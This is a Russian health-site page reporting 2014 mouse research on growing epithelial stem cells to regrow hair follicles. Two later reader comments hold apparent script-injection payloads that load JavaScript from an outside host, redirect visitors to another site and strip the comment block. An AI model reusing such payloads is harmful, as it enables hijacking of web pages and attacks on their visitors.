Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Стволовые клетки сделают ...  >>  Стволовые клетки сделают вашего мужа красавцем
 
Обратная связь
 

Стволовые клетки сделают вашего мужа красавцем

Размер шрифта
20 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

На горизонте забрезжила новая надежда для лысеющих мужчин – ученые научились лечить этот недуг с помощью стволовых клеток. Правда, пока только у мышей.

Стволовые клетки сделают вашего мужа красавцем

В прошлом исследователи уже не раз успешно применяли стволовые клетки для восстановления исчезнувших или умирающих волосяных фолликулов. Однако до сего момента выращивание оных клеток было задачей чрезвычайно трудной и, по сути, невыполнимой в промышленных масштабах.

Теперь это препятствие удалось преодолеть.

«Мы научились выращивать эпителиальные стволовые клетки в нужных количествах с сохранением их адекватной генеративной способности», – утверждает доктор Сяовей Сю, доцент кафедры дерматологии Университета штата Пенсильвания (США).

«Этим клеткам можно найти множество способов применения – от косметологии до лечения ран».

В ходе своего исследования доктор Сю и его коллеги сумели преобразовать плюрипотентную стволовую клетку (незрелую) в эпителиальную стволовую клетку, которая является более зрелой и способна генерировать только производные кожи.

Эти эпителиальные клетки затем смешивали с другими клетками, и полученную смесь имплантировали под кожу мышей. Спустя некоторое время ученые обнаружили, что на поверхности животных выросли островки человеческой кожи с волосяными фолликулами. Это свидетельствует о том, что данную технологию можно будет использовать в будущем для восстановления волосяного покрова у людей.

Cю подчеркивает, что несмотря на однозначный успех их исследования, говорить о победе над облысением преждевременно.

«Мы выяснили, как выращивать эпителиальный компонент волосяного фолликула. Но у этой структуры есть и друга, не менее важная составляющая – так называемый волосяной сосочек. И в генерации этих сосочков мы, к сожалению, не смогли далеко продвинуться», – рассказывает доктор Сю.

Кроме того, говорить о значимости этой методики невозможно до тех пор, пока она не будет протестирована на людях.

Однако перспективы этой технологии специалисты оценивают с большим оптимизмом.

Облысение, эректильная дисфункция, преждевременная эякуляция – эти и другие проблемы, животрепещущие для каждого мужчины, освещаются на страницах нашего специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 июня 2014 в 15:00

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Может ли порнография вызывать зависимость?!   Упражнения для секса   Насколько большим должен быть нормальный половой член?   Как не потерять мужа?  
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Чем полезен секс?
А вы жертва мифов об импотенции?
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.